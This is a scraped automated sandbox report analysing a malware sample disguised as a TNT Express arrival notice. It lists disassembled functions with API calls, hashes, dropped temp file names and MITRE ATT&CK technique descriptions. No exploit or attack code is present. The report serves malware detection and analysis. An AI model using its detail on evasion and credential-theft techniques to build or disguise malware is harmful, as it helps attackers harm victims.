Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: cba536945c395a5ecf1559e7ec08bcfd1a960bf96d1029980301c08b5e349cbe
Instruction ID: 3a328164811fa65d57ad1c4f7b663c9fd1fe2b2317b0a3dcb7cc4fc84e8e6935
Opcode Fuzzy Hash: cba536945c395a5ecf1559e7ec08bcfd1a960bf96d1029980301c08b5e349cbe
Instruction Fuzzy Hash: DD01A7756811186BCB04FB94D956EFF77ACEB61340F140029E896B7285EA349F1CC7B2

Function 00921C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008C9CB3: _wcslen.LIBCMT ref: 008C9CBD

Part of subcall function 00923CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00923CCA

SendMessageW.USER32(?,00000182,?,00000000), ref: 00921CC8

Strings

ComboBox, xrefs: 00921C69
ListBox, xrefs: 00921C94

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 897d8baac55c4dcff643dd56843ad18b130326482cbbfc0eea0fc77166dc8c66
Instruction ID: ce8be2879ff212c1c27d9608fa043dd19163de0c093e4e6bceec2a27bfe710d5
Opcode Fuzzy Hash: 897d8baac55c4dcff643dd56843ad18b130326482cbbfc0eea0fc77166dc8c66
Instruction Fuzzy Hash: E501DB7564112467CB04FB94DA15FFE77ACEB21340F140029B881B3285EA34DF18C772

Function 0094747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00947493
_wcslen.LIBCMT ref: 009474B9

Strings

3, 3, 16, 1, xrefs: 00947483

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: _wcslen
String ID: 3, 3, 16, 1
API String ID: 176396367-3042988571
Opcode ID: 0af1f04dd70847063551a7d34fe4ecfcbd39e1c73ba476fcc765ba3305aabf18
Instruction ID: 1569011ec2d7add59f2010663621efbe7f5178de91103cc5d197e710d98e5b5b
Opcode Fuzzy Hash: 0af1f04dd70847063551a7d34fe4ecfcbd39e1c73ba476fcc765ba3305aabf18
Instruction Fuzzy Hash: 74E0E50220426010923122BAACC1E7F9A8EDECA750710282BF985D227BEB948D9193A2

Function 00920B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00920B23

Strings

AutoIt, xrefs: 00920B17
Error allocating memory., xrefs: 00920B1C

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 7f883950a2e7a6b4776b4484c0a41acc4d9f88270fa487e17137361fefc8eb3a
Instruction ID: 190133a1edfa8376e2aec45a949669e397799788d0e81b56ec2ce7088637b10b
Opcode Fuzzy Hash: 7f883950a2e7a6b4776b4484c0a41acc4d9f88270fa487e17137361fefc8eb3a
Instruction Fuzzy Hash: 79E0D8712443182ED224369A7C03F897B84DF09F65F10042BFB88D55C38AE2645057AA

Function 008E0D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 008DF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,008E0D71,?,?,?,008C100A), ref: 008DF7CE

IsDebuggerPresent.KERNEL32(?,?,?,008C100A), ref: 008E0D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,008C100A), ref: 008E0D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 008E0D7F

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: b163a5340cdbd87d3c8c00d33625ccd146e05c7fdc9ef2e32a68cc43b4fdf39a
Instruction ID: f40d996b2d1b02d646dd217731ad3631ed077dc535d770c72852d750e54041eb
Opcode Fuzzy Hash: b163a5340cdbd87d3c8c00d33625ccd146e05c7fdc9ef2e32a68cc43b4fdf39a
Instruction Fuzzy Hash: 1EE039B02007818BD720AFAEE8057467BE0FB04745F004A2DE892C6655DBF0E4889FA2

Function 0091D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0091D220

Strings

%.3d, xrefs: 0091D22B
X64, xrefs: 0091D2A8

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: 07ab59d89469bf2de7fb16df53e34b2a7996e0c2a04223a79df7f122de401ca7
Instruction ID: df23d7d7f52b57aef820b39cc3f29fbd915f78f159a64a9d602d15a4d2bdc5b8
Opcode Fuzzy Hash: 07ab59d89469bf2de7fb16df53e34b2a7996e0c2a04223a79df7f122de401ca7
Instruction Fuzzy Hash: A6D012A190A21CE9CB5096D0DC459F9B37CFB59301F608C53F936D1140D63CD588A762

Function 00952322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0095232C
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0095233F

Part of subcall function 0092E97B: Sleep.KERNEL32 ref: 0092E9F3

Strings

Shell_TrayWnd, xrefs: 00952325

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: d999befd83a8f294057d6c51e377914e023927eae5edc3e9bca0f8c29a98027c
Instruction ID: 93a82dbfdc37f97c9ec80b9cd078d0eda5db67de81b6aa37e57c89b57b484022
Opcode Fuzzy Hash: d999befd83a8f294057d6c51e377914e023927eae5edc3e9bca0f8c29a98027c
Instruction Fuzzy Hash: 8AD022B63A8310BBE364B371EC1FFC67A049B40B01F00090A7305AA1D0C8F0A801CB44

Function 00952356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0095236C
PostMessageW.USER32(00000000), ref: 00952373

Part of subcall function 0092E97B: Sleep.KERNEL32 ref: 0092E9F3

Strings

Shell_TrayWnd, xrefs: 00952365

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: a00c511734534b58e36b7b4db44ee446982f61037ab6add0d79586f3ff5b25fe
Instruction ID: 1fa97635ebfe21f9c8a768526598ad014dd80bf92025dfa10e9876a553865f43
Opcode Fuzzy Hash: a00c511734534b58e36b7b4db44ee446982f61037ab6add0d79586f3ff5b25fe
Instruction Fuzzy Hash: 76D0A9B23993107AE264B371AC0FFC666049B40B01F00090A7201AA1D0C8A0A8018B48

Function 008FBDFD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 008FBE93
GetLastError.KERNEL32 ref: 008FBEA1
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 008FBEFC

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 607abf7a84db4855d7a911dbeb9f84e8361b40117c7b3c968b1f8543f8391dc8
Instruction ID: 45daf6ffbc936d40f1b1522ec84e06e9178ff3b248d820b0efb9401d8c6d21c9
Opcode Fuzzy Hash: 607abf7a84db4855d7a911dbeb9f84e8361b40117c7b3c968b1f8543f8391dc8
Instruction Fuzzy Hash: 5A41C33460420EAFCB218FB9CC44ABA7BA5FF42320F244169FA59D71A1EF308D00DB61

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\6D395-7-

C:\Users\user\AppData\Local\Temp\autC1A7.tmp

C:\Users\user\AppData\Local\Temp\autC1D7.tmp

C:\Users\user\AppData\Local\Temp\cerecloths

C:\Users\user\AppData\Local\Temp\subbase

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Windows Analysis Report
TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe

Function 008C42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Function 008C42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 00902BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Function 008C2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 0090065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 008C344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 008C2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Function 008C3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Function 008F8D45 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Function 008B2620 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 008C2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 008B23B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 159
fileCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
